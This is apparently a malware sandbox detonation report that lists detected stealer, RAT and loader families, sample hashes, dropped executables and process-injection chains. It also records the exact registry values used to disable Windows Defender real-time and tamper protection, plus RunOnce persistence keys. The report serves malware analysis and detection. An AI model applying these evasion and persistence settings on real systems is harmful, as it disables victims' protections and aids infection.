memory/2044-1321-0x0000000002870000-0x00000000028F0000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 20:26

Reported

2023-10-10 20:37

Platform

win10v2004-20230915-en

Max time kernel

67s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\12E9.bat N/A
Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1983.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6013.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c2929078.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1102.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\122C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\12E9.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1480.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WK02es6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1983.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2NB190Af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6013.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\75BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\79A8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7B00.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\15C9.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\1102.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe N/A

Legitimate hosting services abused for malware hosting/C2

Detected potential entity reuse from brand microsoft.

phishing microsoft

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7B00.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\75BF.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4988 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 4988 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 4988 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe
PID 2208 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2208 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 2208 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe
PID 1604 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1604 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2208 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe
PID 2208 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe
PID 2208 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4780 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5499453.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4988 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c2929078.exe
PID 4988 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c2929078.exe
PID 4988 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c2929078.exe
PID 2540 wrote to memory of 3328 N/A N/A C:\Users\Admin\AppData\Local\Temp\1102.exe
PID 2540 wrote to memory of 3328 N/A N/A C:\Users\Admin\AppData\Local\Temp\1102.exe
PID 2540 wrote to memory of 3328 N/A N/A C:\Users\Admin\AppData\Local\Temp\1102.exe
PID 2540 wrote to memory of 3092 N/A N/A C:\Users\Admin\AppData\Local\Temp\122C.exe
PID 2540 wrote to memory of 3092 N/A N/A C:\Users\Admin\AppData\Local\Temp\122C.exe
PID 2540 wrote to memory of 3092 N/A N/A C:\Users\Admin\AppData\Local\Temp\122C.exe
PID 3328 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\1102.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe
PID 3328 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\1102.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe
PID 3328 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\1102.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe
PID 2540 wrote to memory of 2228 N/A N/A C:\Users\Admin\AppData\Local\Temp\12E9.bat
PID 2540 wrote to memory of 2228 N/A N/A C:\Users\Admin\AppData\Local\Temp\12E9.bat
PID 2540 wrote to memory of 2228 N/A N/A C:\Users\Admin\AppData\Local\Temp\12E9.bat
PID 5096 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe
PID 5096 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe
PID 5096 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe
PID 4792 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe
PID 4792 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe
PID 4792 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe
PID 2540 wrote to memory of 2736 N/A N/A C:\Users\Admin\AppData\Local\Temp\1480.exe
PID 2540 wrote to memory of 2736 N/A N/A C:\Users\Admin\AppData\Local\Temp\1480.exe
PID 2540 wrote to memory of 2736 N/A N/A C:\Users\Admin\AppData\Local\Temp\1480.exe
PID 3788 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe
